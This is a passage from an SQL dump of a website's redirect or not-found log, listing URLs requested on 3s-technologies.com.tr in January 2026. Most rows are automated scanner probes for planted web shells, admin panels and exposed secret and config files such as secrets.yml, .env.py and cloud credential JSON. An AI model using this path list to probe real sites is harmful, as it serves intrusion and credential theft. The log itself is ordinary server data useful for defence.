00:00:00',301),(56325,'http://mail.3s-technologies.com.tr/tr/wp-admin/user-new.php',NULL,'','',5,0,'2026-01-17 18:52:02','0000-00-00 00:00:00',301),(56326,'http://mail.3s-technologies.com.tr/tr/apsarasarts/okk.php',NULL,'','',5,0,'2026-01-17 18:52:04','0000-00-00 00:00:00',301),(56327,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/core-econx/up.php',NULL,'','',6,0,'2026-01-17 18:52:04','0000-00-00 00:00:00',301),(56328,'http://mail.3s-technologies.com.tr/tr/backup/db.php',NULL,'','',1,0,'2026-01-17 18:52:05','0000-00-00 00:00:00',301),(56329,'http://mail.3s-technologies.com.tr/tr/seni_budaya/admin',NULL,'','',1,0,'2026-01-17 18:52:06','0000-00-00 00:00:00',301),(56330,'https://3s-technologies.com.tr/tr/connexion?view=registration',NULL,'','',1,0,'2026-01-18 09:38:42','0000-00-00 00:00:00',301),(56331,'http://3s-technologies.com.tr/tr/wp-ver.php',NULL,'','',5,0,'2026-01-18 13:15:46','0000-00-00 00:00:00',301),(56332,'http://3s-technologies.com.tr/tr/resetpw.php',NULL,'','',1,0,'2026-01-18 21:50:19','0000-00-00 00:00:00',301),(56333,'http://3s-technologies.com.tr/tr/pip-install.php',NULL,'','',1,0,'2026-01-18 21:50:19','0000-00-00 00:00:00',301),(56334,'http://3s-technologies.com.tr/tr/mtzrkdea.php',NULL,'','',1,0,'2026-01-18 21:50:20','0000-00-00 00:00:00',301),(56335,'http://3s-technologies.com.tr/tr/endpoint.php',NULL,'','',1,0,'2026-01-18 21:50:24','0000-00-00 00:00:00',301),(56336,'http://3s-technologies.com.tr/tr/mfi.php',NULL,'','',1,0,'2026-01-18 21:50:25','0000-00-00 00:00:00',301),(56337,'http://3s-technologies.com.tr/tr/p6ko99ke.php',NULL,'','',1,0,'2026-01-18 21:50:25','0000-00-00 00:00:00',301),(56338,'http://3s-technologies.com.tr/tr/phpzipincs.php',NULL,'','',1,0,'2026-01-18 21:50:27','0000-00-00 00:00:00',301),(56339,'http://3s-technologies.com.tr/tr/923924098...php',NULL,'','',1,0,'2026-01-18 21:50:29','0000-00-00 00:00:00',301),(56340,'http://3s-technologies.com.tr/tr/yjuizcfz.php',NULL,'','',1,0,'2026-01-18 21:50:29','0000-00-00 00:00:00',301),(56341,'http://3s-technologies.com.tr/tr/masss.php',NULL,'','',1,0,'2026-01-18 21:50:30','0000-00-00 00:00:00',301),(56342,'http://3s-technologies.com.tr/tr/cut.php',NULL,'','',1,0,'2026-01-18 21:50:30','0000-00-00 00:00:00',301),(56343,'http://3s-technologies.com.tr/tr/tazmztja.php',NULL,'','',1,0,'2026-01-18 21:50:32','0000-00-00 00:00:00',301),(56344,'http://3s-technologies.com.tr/tr/o2ytteco.php',NULL,'','',1,0,'2026-01-18 21:50:33','0000-00-00 00:00:00',301),(56345,'http://3s-technologies.com.tr/tr/edit-link-form.php',NULL,'','',1,0,'2026-01-18 21:50:34','0000-00-00 00:00:00',301),(56346,'http://3s-technologies.com.tr/tr/bussubmit.php',NULL,'','',1,0,'2026-01-18 21:50:39','0000-00-00 00:00:00',301),(56347,'http://3s-technologies.com.tr/tr/virus.php',NULL,'','',1,0,'2026-01-18 21:50:39','0000-00-00 00:00:00',301),(56348,'http://3s-technologies.com.tr/tr/mszydssv.php',NULL,'','',1,0,'2026-01-18 21:50:41','0000-00-00 00:00:00',301),(56349,'http://3s-technologies.com.tr/tr/var/www/tagtek/s_e.php',NULL,'','',1,0,'2026-01-18 21:50:41','0000-00-00 00:00:00',301),(56350,'http://3s-technologies.com.tr/tr/sql_editor.php',NULL,'','',1,0,'2026-01-18 21:50:43','0000-00-00 00:00:00',301),(56351,'http://3s-technologies.com.tr/tr/udd.php',NULL,'','',1,0,'2026-01-18 21:50:45','0000-00-00 00:00:00',301),(56352,'http://3s-technologies.com.tr/tr/cpvcigyk.php',NULL,'','',1,0,'2026-01-18 21:50:45','0000-00-00 00:00:00',301),(56353,'http://3s-technologies.com.tr/tr/china.php',NULL,'','',1,0,'2026-01-18 21:50:46','0000-00-00 00:00:00',301),(56354,'http://3s-technologies.com.tr/tr/wsoyanz1.php',NULL,'','',5,0,'2026-01-18 21:50:49','0000-00-00 00:00:00',301),(56355,'http://3s-technologies.com.tr/tr/chtmlfuns.php',NULL,'','',2,0,'2026-01-18 21:50:50','0000-00-00 00:00:00',301),(56356,'http://3s-technologies.com.tr/tr/ioxi-aneh.php',NULL,'','',1,0,'2026-01-18 21:50:52','0000-00-00 00:00:00',301),(56357,'http://3s-technologies.com.tr/tr/api_download.php',NULL,'','',1,0,'2026-01-18 21:50:53','0000-00-00 00:00:00',301),(56358,'http://3s-technologies.com.tr/tr/gix.php',NULL,'','',1,0,'2026-01-18 21:50:55','0000-00-00 00:00:00',301),(56359,'http://3s-technologies.com.tr/tr/bxjdihkz.php',NULL,'','',1,0,'2026-01-18 21:50:56','0000-00-00 00:00:00',301),(56360,'http://3s-technologies.com.tr/tr/xeijumgl.php',NULL,'','',1,0,'2026-01-18 21:50:58','0000-00-00 00:00:00',301),(56361,'http://3s-technologies.com.tr/tr/mart.php',NULL,'','',1,0,'2026-01-18 21:50:59','0000-00-00 00:00:00',301),(56362,'http://3s-technologies.com.tr/tr/ten.php',NULL,'','',1,0,'2026-01-18 21:51:00','0000-00-00 00:00:00',301),(56363,'http://3s-technologies.com.tr/tr/w4t52zsxj9b.php',NULL,'','',1,0,'2026-01-18 21:51:03','0000-00-00 00:00:00',301),(56364,'http://3s-technologies.com.tr/tr/var/www/cgi-bin/install.php',NULL,'','',1,0,'2026-01-18 21:51:03','0000-00-00 00:00:00',301),(56365,'http://3s-technologies.com.tr/tr/wp-303.php',NULL,'','',1,0,'2026-01-18 21:51:09','0000-00-00 00:00:00',301),(56366,'http://3s-technologies.com.tr/tr/pegi.php',NULL,'','',1,0,'2026-01-18 21:51:10','0000-00-00 00:00:00',301),(56367,'http://3s-technologies.com.tr/tr/blkaabkj.php',NULL,'','',1,0,'2026-01-18 21:51:12','0000-00-00 00:00:00',301),(56368,'http://3s-technologies.com.tr/tr/bolxmijf.php',NULL,'','',1,0,'2026-01-18 21:51:14','0000-00-00 00:00:00',301),(56369,'http://3s-technologies.com.tr/tr/bihnmimh.php',NULL,'','',1,0,'2026-01-18 21:51:15','0000-00-00 00:00:00',301),(56370,'https://3s-technologies.com.tr/tr/env.js',NULL,'https://3s-technologies.com.tr/env.js','',1,0,'2026-01-19 15:12:56','0000-00-00 00:00:00',301),(56371,'https://3s-technologies.com.tr/tr/keys.js',NULL,'https://3s-technologies.com.tr/keys.js','',1,0,'2026-01-19 15:12:57','0000-00-00 00:00:00',301),(56372,'https://3s-technologies.com.tr/tr/app/root.tsx',NULL,'https://3s-technologies.com.tr/app/root.tsx','',1,0,'2026-01-19 15:12:58','0000-00-00 00:00:00',301),(56373,'https://3s-technologies.com.tr/tr/settings.js',NULL,'https://3s-technologies.com.tr/settings.js','',1,0,'2026-01-19 15:12:58','0000-00-00 00:00:00',301),(56374,'https://3s-technologies.com.tr/tr/constants.js',NULL,'https://3s-technologies.com.tr/constants.js','',1,0,'2026-01-19 15:12:58','0000-00-00 00:00:00',301),(56375,'https://3s-technologies.com.tr/tr/stripe.js',NULL,'https://3s-technologies.com.tr/stripe.js','',1,0,'2026-01-19 15:12:58','0000-00-00 00:00:00',301),(56376,'https://3s-technologies.com.tr/tr/api.js',NULL,'https://3s-technologies.com.tr/api.js','',1,0,'2026-01-19 15:12:58','0000-00-00 00:00:00',301),(56377,'http://mail.3s-technologies.com.tr/tr/tx38.php',NULL,'','',2,0,'2026-01-20 04:15:45','0000-00-00 00:00:00',301),(56378,'http://3s-technologies.com.tr/tr/lm13.php',NULL,'','',2,0,'2026-01-20 05:53:12','0000-00-00 00:00:00',301),(56379,'http://3s-technologies.com.tr/tr/ws45.php',NULL,'','',5,0,'2026-01-20 05:53:47','0000-00-00 00:00:00',301),(56380,'http://3s-technologies.com.tr/tr/ws33.php',NULL,'','',2,0,'2026-01-20 05:53:49','0000-00-00 00:00:00',301),(56381,'http://3s-technologies.com.tr/tr/ws38.php',NULL,'','',14,0,'2026-01-20 05:53:57','0000-00-00 00:00:00',301),(56382,'http://3s-technologies.com.tr/tr/ws37.php',NULL,'','',7,0,'2026-01-20 05:54:06','0000-00-00 00:00:00',301),(56383,'http://3s-technologies.com.tr/tr/tx38.php',NULL,'','',2,0,'2026-01-20 05:54:13','0000-00-00 00:00:00',301),(56384,'http://3s-technologies.com.tr/tr/ws36.php',NULL,'','',6,0,'2026-01-20 05:54:20','0000-00-00 00:00:00',301),(56385,'http://3s-technologies.com.tr/tr/xxw.php',NULL,'','',27,0,'2026-01-20 05:54:29','0000-00-00 00:00:00',301),(56386,'http://3s-technologies.com.tr/tr/xeqdlun.php',NULL,'','',2,0,'2026-01-20 05:54:43','0000-00-00 00:00:00',301),(56387,'http://mail.3s-technologies.com.tr/tr/eee.php',NULL,'','',14,0,'2026-01-20 15:00:47','0000-00-00 00:00:00',301),(56388,'http://mail.3s-technologies.com.tr/tr/webadmin.php',NULL,'','',6,0,'2026-01-20 15:00:48','0000-00-00 00:00:00',301),(56389,'http://mail.3s-technologies.com.tr/tr/class.api.php',NULL,'','',2,0,'2026-01-20 15:00:51','0000-00-00 00:00:00',301),(56390,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/finley/min.php',NULL,'','',2,0,'2026-01-20 15:00:53','0000-00-00 00:00:00',301),(56391,'http://mail.3s-technologies.com.tr/tr/siteheads.php',NULL,'','',6,0,'2026-01-20 15:00:54','0000-00-00 00:00:00',301),(56392,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/admin.php',NULL,'','',18,0,'2026-01-20 15:00:56','0000-00-00 00:00:00',301),(56393,'http://mail.3s-technologies.com.tr/tr/wp-logout.php',NULL,'','',1,0,'2026-01-20 15:00:57','0000-00-00 00:00:00',301),(56394,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/about.php',NULL,'','',2,0,'2026-01-20 15:01:03','0000-00-00 00:00:00',301),(56395,'http://mail.3s-technologies.com.tr/tr/ms-users.php',NULL,'','',1,0,'2026-01-20 15:01:05','0000-00-00 00:00:00',301),(56396,'http://mail.3s-technologies.com.tr/tr/revision.php',NULL,'','',6,0,'2026-01-20 15:01:07','0000-00-00 00:00:00',301),(56397,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/about.php',NULL,'','',6,0,'2026-01-20 15:01:09','0000-00-00 00:00:00',301),(56398,'http://mail.3s-technologies.com.tr/tr/page.php',NULL,'','',4,0,'2026-01-20 15:01:18','0000-00-00 00:00:00',301),(56399,'http://mail.3s-technologies.com.tr/tr/tempfuns.php',NULL,'','',1,0,'2026-01-20 15:01:19','0000-00-00 00:00:00',301),(56400,'http://mail.3s-technologies.com.tr/tr/f0x.php',NULL,'','',2,0,'2026-01-20 15:01:28','0000-00-00 00:00:00',301),(56401,'http://mail.3s-technologies.com.tr/tr/1100.php',NULL,'','',9,0,'2026-01-20 15:01:50','0000-00-00 00:00:00',301),(56402,'http://mail.3s-technologies.com.tr/tr/ws46.php',NULL,'','',3,0,'2026-01-20 15:01:51','0000-00-00 00:00:00',301),(56403,'http://mail.3s-technologies.com.tr/tr/ws43.php',NULL,'','',4,0,'2026-01-20 15:01:52','0000-00-00 00:00:00',301),(56404,'http://mail.3s-technologies.com.tr/tr/ng.php',NULL,'','',18,0,'2026-01-20 15:02:59','0000-00-00 00:00:00',301),(56405,'http://mail.3s-technologies.com.tr/tr/webix.php?p=',NULL,'','',1,0,'2026-01-20 15:03:01','0000-00-00 00:00:00',301),(56406,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/coffee/cache.php?pass=fcc7a4900087e4d11e6774b6b0f8467b',NULL,'','',1,0,'2026-01-20 17:39:35','0000-00-00 00:00:00',301),(56407,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/ectoplasm/cache.php?pass=9a74f1a60dbf0f02d9c7327f9e66a5d8',NULL,'','',1,0,'2026-01-20 17:39:36','0000-00-00 00:00:00',301),(56408,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/midnight/cache.php?pass=80060c5e7ed6eaa1c5fec465d37bf212',NULL,'','',1,0,'2026-01-20 17:39:36','0000-00-00 00:00:00',301),(56409,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/colors/cache.php?pass=084feb330f49fc74f390119c08a8515f',NULL,'','',1,0,'2026-01-20 17:39:37','0000-00-00 00:00:00',301),(56410,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/ocean/cache.php?pass=f0f01a17de3281fd1cc7b39fa5bd3fdb',NULL,'','',1,0,'2026-01-20 17:39:39','0000-00-00 00:00:00',301),(56411,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/sunrise/cache.php?pass=fd82d9a1965c4f76d21c2a62c0e776b0',NULL,'','',1,0,'2026-01-20 17:39:40','0000-00-00 00:00:00',301),(56412,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/blue/cache.php?pass=cea0e58fac5c5d5bdab4b221bb077707',NULL,'','',1,0,'2026-01-20 17:39:41','0000-00-00 00:00:00',301),(56413,'https://3s-technologies.com.tr/en/wp-includes/id3/index.php',NULL,'','',4,0,'2026-01-21 07:16:08','0000-00-00 00:00:00',301),(56414,'http://3s-technologies.com.tr/tr/secrets.php',NULL,'','',2,0,'2026-01-21 22:34:31','0000-00-00 00:00:00',301),(56415,'http://3s-technologies.com.tr/tr/reg.php',NULL,'','',2,0,'2026-01-21 22:35:34','0000-00-00 00:00:00',301),(56416,'http://3s-technologies.com.tr/tr/index_sso.php',NULL,'','',2,0,'2026-01-21 22:35:39','0000-00-00 00:00:00',301),(56417,'https://3s-technologies.com.tr/tr/conn.php',NULL,'','',1,0,'2026-01-22 05:12:34','0000-00-00 00:00:00',301),(56418,'https://3s-technologies.com.tr/tr/connect.php',NULL,'','',1,0,'2026-01-22 05:12:40','0000-00-00 00:00:00',301),(56419,'https://3s-technologies.com.tr/tr/config.old.php',NULL,'','',1,0,'2026-01-22 05:12:45','0000-00-00 00:00:00',301),(56420,'https://3s-technologies.com.tr/tr/app/config.php',NULL,'','',1,0,'2026-01-22 05:12:50','0000-00-00 00:00:00',301),(56421,'https://3s-technologies.com.tr/tr/settings.py',NULL,'','',1,0,'2026-01-22 05:13:21','0000-00-00 00:00:00',301),(56422,'https://3s-technologies.com.tr/tr/local_settings.py',NULL,'','',1,0,'2026-01-22 05:13:28','0000-00-00 00:00:00',301),(56423,'https://3s-technologies.com.tr/tr/production.py',NULL,'','',1,0,'2026-01-22 05:13:35','0000-00-00 00:00:00',301),(56424,'https://3s-technologies.com.tr/tr/dev.py',NULL,'','',1,0,'2026-01-22 05:13:36','0000-00-00 00:00:00',301),(56425,'https://3s-technologies.com.tr/tr/config/__init__.py',NULL,'','',1,0,'2026-01-22 05:13:52','0000-00-00 00:00:00',301),(56426,'https://3s-technologies.com.tr/tr/settings/__init__.py',NULL,'','',1,0,'2026-01-22 05:13:53','0000-00-00 00:00:00',301),(56427,'https://3s-technologies.com.tr/tr/.env.py',NULL,'','',1,0,'2026-01-22 05:13:55','0000-00-00 00:00:00',301),(56428,'https://3s-technologies.com.tr/tr/config.rb',NULL,'','',1,0,'2026-01-22 05:14:01','0000-00-00 00:00:00',301),(56429,'https://3s-technologies.com.tr/tr/database.yml',NULL,'','',1,0,'2026-01-22 05:14:02','0000-00-00 00:00:00',301),(56430,'https://3s-technologies.com.tr/tr/secrets.yml',NULL,'','',1,0,'2026-01-22 05:14:04','0000-00-00 00:00:00',301),(56431,'https://3s-technologies.com.tr/tr/credentials.yml.enc',NULL,'','',1,0,'2026-01-22 05:14:05','0000-00-00 00:00:00',301),(56432,'https://3s-technologies.com.tr/tr/config/database.yml',NULL,'','',1,0,'2026-01-22 05:14:06','0000-00-00 00:00:00',301),(56433,'https://3s-technologies.com.tr/tr/application.yml',NULL,'','',1,0,'2026-01-22 05:14:59','0000-00-00 00:00:00',301),(56434,'https://3s-technologies.com.tr/tr/persistence.xml',NULL,'','',1,0,'2026-01-22 05:16:05','0000-00-00 00:00:00',301),(56435,'https://3s-technologies.com.tr/tr/web.config',NULL,'','',1,0,'2026-01-22 05:16:11','0000-00-00 00:00:00',301),(56436,'https://3s-technologies.com.tr/tr/app.config',NULL,'','',1,0,'2026-01-22 05:16:12','0000-00-00 00:00:00',301),(56437,'https://3s-technologies.com.tr/tr/connectionstrings.config',NULL,'','',1,0,'2026-01-22 05:16:16','0000-00-00 00:00:00',301),(56438,'https://3s-technologies.com.tr/tr/package.json',NULL,'','',1,0,'2026-01-22 05:16:18','0000-00-00 00:00:00',301),(56439,'https://3s-technologies.com.tr/tr/config.xml',NULL,'','',1,0,'2026-01-22 05:17:59','0000-00-00 00:00:00',301),(56440,'https://3s-technologies.com.tr/tr/db.json',NULL,'','',1,0,'2026-01-22 05:20:08','0000-00-00 00:00:00',301),(56441,'https://3s-technologies.com.tr/tr/mongo.json',NULL,'','',1,0,'2026-01-22 05:20:29','0000-00-00 00:00:00',301),(56442,'https://3s-technologies.com.tr/tr/redis.conf',NULL,'','',1,0,'2026-01-22 05:20:46','0000-00-00 00:00:00',301),(56443,'https://3s-technologies.com.tr/tr/.circleci/config.yml',NULL,'','',1,0,'2026-01-22 05:21:02','0000-00-00 00:00:00',301),(56444,'https://3s-technologies.com.tr/tr/.travis.yml',NULL,'','',1,0,'2026-01-22 05:21:04','0000-00-00 00:00:00',301),(56445,'https://3s-technologies.com.tr/tr/jenkinsfile',NULL,'','',1,0,'2026-01-22 05:21:06','0000-00-00 00:00:00',301),(56446,'https://3s-technologies.com.tr/tr/gcloud.json',NULL,'','',1,0,'2026-01-22 05:21:43','0000-00-00 00:00:00',301),(56447,'https://3s-technologies.com.tr/tr/azure.json',NULL,'','',1,0,'2026-01-22 05:21:49','0000-00-00 00:00:00',301),(56448,'http://3s-technologies.com.tr/tr/configuration.php-',NULL,'','',1,0,'2026-01-22 09:00:26','0000-00-00 00:00:00',301),(56449,'http://3s-technologies.com.tr/tr/_kickstart.php',NULL,'','',1,0,'2026-01-22 09:16:20','0000-00-00 00:00:00',301),(56450,'http://3s-technologies.com.tr/tr/configuration.php0',NULL,'','',1,0,'2026-01-22 09:46:08','0000-00-00 00:00:00',301),(56451,'http://3s-technologies.com.tr/tr/eee.php',NULL,'','',28,0,'2026-01-23 00:47:51','0000-00-00 00:00:00',301),(56452,'http://3s-technologies.com.tr/tr/ms-users.php',NULL,'','',1,0,'2026-01-23 00:48:02','0000-00-00 00:00:00',301),(56453,'http://3s-technologies.com.tr/tr/ws46.php',NULL,'','',3,0,'2026-01-23 00:48:30','0000-00-00 00:00:00',301),(56454,'http://3s-technologies.com.tr/tr/ws43.php',NULL,'','',4,0,'2026-01-23 00:48:30','0000-00-00 00:00:00',301),(56455,'http://3s-technologies.com.tr/tr/bitrix/wp-content.php',NULL,'','',1,0,'2026-01-23 07:50:07','0000-00-00 00:00:00',301),(56456,'http://3s-technologies.com.tr/tr/baixy.php',NULL,'','',23,0,'2026-01-23 15:52:55','0000-00-00 00:00:00',301),(56457,'http://3s-technologies.com.tr/tr/davaa.php',NULL,'','',1,0,'2026-01-23 15:52:58','0000-00-00 00:00:00',301),(56458,'http://3s-technologies.com.tr/tr/ceiif.php',NULL,'','',1,0,'2026-01-23 15:52:59','0000-00-00 00:00:00',301),(56459,'http://mail.3s-technologies.com.tr/tr/baixy.php',NULL,'','',11,0,'2026-01-23 15:56:18','0000-00-00 00:00:00',301),(56460,'http://mail.3s-technologies.com.tr/tr/davaa.php',NULL,'','',1,0,'2026-01-23 15:56:20','0000-00-00 00:00:00',301),(56461,'http://mail.3s-technologies.com.tr/tr/ceiif.php',NULL,'','',2,0,'2026-01-23 15:56:20','0000-00-00 00:00:00',301),(56462,'https://3s-technologies.com.tr/tr/adm.php',NULL,'https://3s-technologies.com.tr/adm.php','',1,0,'2026-01-23 16:30:51','0000-00-00 00:00:00',301),(56463,'https://3s-technologies.com.tr/tr/ad.php',NULL,'https://3s-technologies.com.tr/ad.php','',1,0,'2026-01-23 16:30:53','0000-00-00 00:00:00',301),(56464,'https://3s-technologies.com.tr/tr/p/m/a',NULL,'https://3s-technologies.com.tr/p/m/a','',1,0,'2026-01-23 18:19:41','0000-00-00 00:00:00',301),(56465,'https://3s-technologies.com.tr/tr/php-my-admin',NULL,'https://3s-technologies.com.tr/php-my-admin','',1,0,'2026-01-23 18:19:44','0000-00-00 00:00:00',301),(56466,'https://3s-technologies.com.tr/tr/php-myadmin',NULL,'https://3s-technologies.com.tr/php-myadmin','',1,0,'2026-01-23 18:19:49','0000-00-00 00:00:00',301),(56467,'https://3s-technologies.com.tr/tr/pma',NULL,'https://3s-technologies.com.tr/pma','',1,0,'2026-01-23 18:19:52','0000-00-00 00:00:00',301),(56468,'http://3s-technologies.com.tr/tr/system/logs/scorpiol.php',NULL,'','',2,0,'2026-01-24 01:19:24','0000-00-00 00:00:00',301),(56469,'http://3s-technologies.com.tr/tr/protected/i.php',NULL,'','',2,0,'2026-01-24 01:19:26','0000-00-00 00:00:00',301),(56470,'http://3s-technologies.com.tr/tr/ru/adminer/adminer474.php',NULL,'','',2,0,'2026-01-24 01:19:27','0000-00-00 00:00:00',301),(56471,'http://3s-technologies.com.tr/tr/assets/authorize.php',NULL,'','',2,0,'2026-01-24 01:19:30','0000-00-00 00:00:00',301),(56472,'http://3s-technologies.com.tr/tr/wp-goods.php',NULL,'','',2,0,'2026-01-24 01:19:57','0000-00-00 00:00:00',301),(56473,'http://3s-technologies.com.tr/tr/fii.php',NULL,'','',5,0,'2026-01-24 01:20:08','0000-00-00 00:00:00',301),(56474,'http://mail.3s-technologies.com.tr/tr/goomaogm.php',NULL,'','',1,0,'2026-01-24 02:38:13','0000-00-00 00:00:00',301),(56475,'http://mail.3s-technologies.com.tr/tr/dede.php',NULL,'','',1,0,'2026-01-24 02:38:14','0000-00-00 00:00:00',301),(56476,'http://mail.3s-technologies.com.tr/tr/dichku.php',NULL,'','',5,0,'2026-01-24 02:38:15','0000-00-00 00:00:00',301),(56477,'http://mail.3s-technologies.com.tr/tr/h2a2ck.php',NULL,'','',5,0,'2026-01-24 02:38:16','0000-00-00 00:00:00',301),(56478,'http://mail.3s-technologies.com.tr/tr/yr.php',NULL,'','',3,0,'2026-01-24 02:38:17','0000-00-00 00:00:00',301),(56479,'http://mail.3s-technologies.com.tr/tr/mks3.php',NULL,'','',1,0,'2026-01-24 02:38:18','0000-00-00 00:00:00',301),(56480,'http://mail.3s-technologies.com.tr/tr/ty226.php',NULL,'','',1,0,'2026-01-24 02:38:20','0000-00-00 00:00:00',301),(56481,'http://mail.3s-technologies.com.tr/tr/yvxhx.php',NULL,'','',1,0,'2026-01-24 02:38:33','0000-00-00 00:00:00',301),(56482,'http://mail.3s-technologies.com.tr/tr/qing2.php',NULL,'','',1,0,'2026-01-24 02:38:35','0000-00-00 00:00:00',301),(56483,'http://mail.3s-technologies.com.tr/tr/doo.php',NULL,'','',1,0,'2026-01-24 02:38:36','0000-00-00 00:00:00',301),(56484,'http://mail.3s-technologies.com.tr/tr/wp-links.php',NULL,'','',3,0,'2026-01-24 02:38:49','0000-00-00 00:00:00',301),(56485,'http://mail.3s-technologies.com.tr/tr/zer.php',NULL,'','',1,0,'2026-01-24 02:38:50','0000-00-00 00:00:00',301),(56486,'http://mail.3s-technologies.com.tr/tr/styles.php',NULL,'','',6,0,'2026-01-24 02:39:01','0000-00-00 00:00:00',301),(56487,'http://mail.3s-technologies.com.tr/tr/sfudq.php',NULL,'','',1,0,'2026-01-24 02:39:14','0000-00-00 00:00:00',301),(56488,'http://mail.3s-technologies.com.tr/tr/asx.php',NULL,'','',1,0,'2026-01-24 02:39:17','0000-00-00 00:00:00',301),(56489,'http://mail.3s-technologies.com.tr/tr/qual.php',NULL,'','',1,0,'2026-01-24 02:39:25','0000-00-00 00:00:00',301),(56490,'http://mail.3s-technologies.com.tr/tr/upl.php',NULL,'','',1,0,'2026-01-24 02:39:35','0000-00-00 00:00:00',301),(56491,'http://mail.3s-technologies.com.tr/tr/massby2.php',NULL,'','',1,0,'2026-01-24 02:39:40','0000-00-00 00:00:00',301),(56492,'http://www.3s-technologies.com.tr/tr/lm13.php',NULL,'','',1,0,'2026-01-24 14:40:08','0000-00-00 00:00:00',301),(56493,'http://www.3s-technologies.com.tr/tr/wto.php',NULL,'','',1,0,'2026-01-24 14:40:16','0000-00-00 00:00:00',301),(56494,'http://www.3s-technologies.com.tr/tr/aaa.php',NULL,'','',10,0,'2026-01-24 14:40:29','0000-00-00 00:00:00',301),(56495,'http://www.3s-technologies.com.tr/tr/finny.php',NULL,'','',1,0,'2026-01-24 14:40:49','0000-00-00 00:00:00',301),(56496,'http://www.3s-technologies.com.tr/tr/ws45.php',NULL,'','',1,0,'2026-01-24 14:40:50','0000-00-00 00:00:00',301),(56497,'http://www.3s-technologies.com.tr/tr/ws33.php',NULL,'','',1,0,'2026-01-24 14:40:52','0000-00-00 00:00:00',301),(56498,'http://www.3s-technologies.com.tr/tr/ws34.php',NULL,'','',1,0,'2026-01-24 14:40:54','0000-00-00 00:00:00',301),(56499,'http://www.3s-technologies.com.tr/tr/ws38.php',NULL,'','',3,0,'2026-01-24 14:41:01','0000-00-00 00:00:00',301),(56500,'http://www.3s-technologies.com.tr/tr/ws37.php',NULL,'','',1,0,'2026-01-24 14:41:12','0000-00-00 00:00:00',301),(56501,'http://www.3s-technologies.com.tr/tr/tx38.php',NULL,'','',1,0,'2026-01-24 14:41:21','0000-00-00 00:00:00',301),(56502,'http://www.3s-technologies.com.tr/tr/akk.php',NULL,'','',1,0,'2026-01-24 14:41:25','0000-00-00 00:00:00',301),(56503,'http://www.3s-technologies.com.tr/tr/ws36.php',NULL,'','',1,0,'2026-01-24 14:41:28','0000-00-00 00:00:00',301),(56504,'http://www.3s-technologies.com.tr/tr/0x0x.php',NULL,'','',3,0,'2026-01-24 14:41:29','0000-00-00 00:00:00',301),(56505,'http://www.3s-technologies.com.tr/tr/size.php',NULL,'','',3,0,'2026-01-24 14:41:33','0000-00-00 00:00:00',301),(56506,'http://www.3s-technologies.com.tr/tr/xxw.php',NULL,'','',5,0,'2026-01-24 14:41:39','0000-00-00 00:00:00',301),(56507,'http://www.3s-technologies.com.tr/tr/v1.php',NULL,'','',1,0,'2026-01-24 14:41:53','0000-00-00 00:00:00',301),(56508,'http://www.3s-technologies.com.tr/tr/xeqdlun.php',NULL,'','',1,0,'2026-01-24 14:41:57','0000-00-00 00:00:00',301),(56509,'http://www.3s-technologies.com.tr/tr/file8.php',NULL,'','',1,0,'2026-01-24 14:42:16','0000-00-00 00:00:00',301),(56510,'http://3s-technologies.com.tr/tr/backup/kickstart.php',NULL,'','',1,0,'2026-01-25 10:31:00','0000-00-00 00:00:00',301),(56511,'http://3s-technologies.com.tr/bitrix/admin/index.php?lang=en',NULL,'','',1,0,'2026-01-26 14:17:04','0000-00-00 00:00:00',301),(56512,'http://3s-technologies.com.tr/tr/rip.php',NULL,'','',120,0,'2026-01-26 17:13:32','0000-00-00 00:00:00',301),(56513,'http://3s-technologies.com.tr/tr/sidfile.php',NULL,'','',1,0,'2026-01-26 17:13:34','0000-00-00 00:00:00',301),(56514,'http://3s-technologies.com.tr/tr/rum.php',NULL,'','',5,0,'2026-01-26 17:13:34','0000-00-00 00:00:00',301),(56515,'http://3s-technologies.com.tr/tr/wp-aoisuki.php',NULL,'','',1,0,'2026-01-26 17:13:37','0000-00-00 00:00:00',301),(56516,'http://3s-technologies.com.tr/tr/naritai.php',NULL,'','',1,0,'2026-01-26 17:13:37','0000-00-00 00:00:00',301),(56517,'http://3s-technologies.com.tr/tr/geaitasa.php',NULL,'','',1,0,'2026-01-26 17:13:40','0000-00-00 00:00:00',301),(56518,'http://3s-technologies.com.tr/tr/class-cc.php',NULL,'','',7,0,'2026-01-26 17:13:40','0000-00-00 00:00:00',301),(56519,'http://3s-technologies.com.tr/tr/reze.php',NULL,'','',34,0,'2026-01-26 17:13:41','0000-00-00 00:00:00',301),(56520,'http://3s-technologies.com.tr/tr/166.php',NULL,'','',103,0,'2026-01-26 17:13:42','0000-00-00 00:00:00',301),(56521,'http://3s-technologies.com.tr/tr/zz8.php',NULL,'','',8,0,'2026-01-26 17:13:44','0000-00-00 00:00:00',301),(56522,'http://3s-technologies.com.tr/tr/ah21.php',NULL,'','',1,0,'2026-01-26 17:13:45','0000-00-00 00:00:00',301),(56523,'http://3s-technologies.com.tr/tr/uploaxa1.php',NULL,'','',5,0,'2026-01-26 17:13:47','0000-00-00 00:00:00',301),(56524,'http://3s-technologies.com.tr/tr/rzzaq.php',NULL,'','',5,0,'2026-01-26 17:13:49','0000-00-00 00:00:00',301),(56525,'http://3s-technologies.com.tr/tr/abtpn.php',NULL,'','',1,0,'2026-01-26 17:13:49','0000-00-00 00:00:00',301),(56526,'http://3s-technologies.com.tr/tr/my1.php',NULL,'','',1,0,'2026-01-26 17:13:50','0000-00-00 00:00:00',301),(56527,'http://3s-technologies.com.tr/tr/ypukprhr.php',NULL,'','',1,0,'2026-01-26 17:13:53','0000-00-00 00:00:00',301),(56528,'http://3s-technologies.com.tr/tr/tcnyz.php',NULL,'','',1,0,'2026-01-26 17:13:53','0000-00-00 00:00:00',301),(56529,'http://3s-technologies.com.tr/tr/wp-includes/txets.php',NULL,'http://3s-technologies.com.tr/wp-includes/txets.php','',18,0,'2026-01-26 18:03:35','0000-00-00 00:00:00',301),(56530,'http://3s-technologies.com.tr/tr/wp-includes/postnews.php',NULL,'http://3s-technologies.com.tr/wp-includes/postnews.php','',12,0,'2026-01-26 